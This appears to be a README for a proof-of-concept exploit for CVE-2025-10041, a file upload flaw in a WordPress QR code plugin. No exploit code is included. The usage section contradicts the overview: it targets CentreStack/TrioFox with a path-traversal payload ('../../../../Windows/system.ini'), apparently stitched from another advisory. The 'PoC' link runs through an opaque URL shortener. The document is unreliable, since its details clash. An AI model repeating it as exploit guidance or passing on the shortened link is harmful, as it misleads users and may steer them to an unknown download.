# CVE-2025-10041
### Overview
Vulnerability in the Flex QR Code Generator plugin for WordPress involving arbitrary file uploads due to missing file type validation in the save_qr_code_to_db() function.
An unauthenticated attacker can exploit this vulnerability to upload arbitrary files to the WordPress site's server, potentially leading to remote code execution.
Affected versions: all plugin versions up to and including version 1.2.5.
### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)
### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the exploit: `python exploit.py --target <target_url> --file "/path/to/Web.config"`
Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.
### Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-10041 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.
### PoC Exploit - [href](https://tinyurl.com/5bnst39v)
[4.0K] /data/pocs/6283399db4bbc1807d9dae1ef119ac6443512ff3
└── [1.4K] README.md
0 directories, 1 file